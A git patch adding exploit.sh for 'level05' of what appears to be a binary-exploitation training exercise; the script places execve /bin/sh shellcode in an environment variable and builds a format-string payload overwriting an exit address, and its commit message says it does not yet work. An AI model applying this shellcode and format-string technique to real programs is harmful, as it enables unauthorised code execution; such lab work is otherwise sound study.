From 0d0573136e111b29df4f32ca2b7146335f7399db Mon Sep 17 00:00:00 2001
From: 0x35c <>
Date: Sat, 10 May 2025 12:57:04 +0200
Subject: [PATCH] level05: exploit should be working but smh does not

---
 level05/ressources/exploit.sh | 32 ++++++++++++++++++++++++++++++++
 1 file changed, 32 insertions(+)
 create mode 100644 level05/ressources/exploit.sh

diff --git a/level05/ressources/exploit.sh b/level05/ressources/exploit.sh
new file mode 100644
index 0000000..4669587
--- /dev/null
+++ b/level05/ressources/exploit.sh
@@ -0,0 +1,32 @@
+#!/bin/sh
+
+export SHELLCODE="\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\xb0\x0b\xcd\x80"
+
+printf '
+#include <stdio.h>
+#include <stdlib.h>
+
+int main(void)
+{
+	printf(\"%%x\", (unsigned int)getenv(\"SHELLCODE\"));
+	return 0;
+}' > /tmp/env.c
+
+gcc -m32 /tmp/env.c -o /tmp/a.out
+/tmp/a.out > /tmp/shellcode_addr
+
+printf '
+with open("/tmp/shellcode_addr") as f: shellcode_addr = f.read()
+
+exit_addr_low = "\\x08\\x04\\x97\\xe0"[::-1]
+exit_addr_high = "\\x08\\x04\\x97\\xe2"[::-1]
+shellcode_low = int(shellcode_addr[4:], 16) - 8
+shellcode_high = int(shellcode_addr[:4], 16) - shellcode_low - 8
+
+payload = "%%{0}d%%10$hn%%{1}d%%11$hn".format(shellcode_low, shellcode_high)
+exploit = exit_addr_low + exit_addr_high + payload
+
+print(exploit)
+' > /tmp/exploit.py
+
+(python /tmp/exploit.py; cat) | ./level05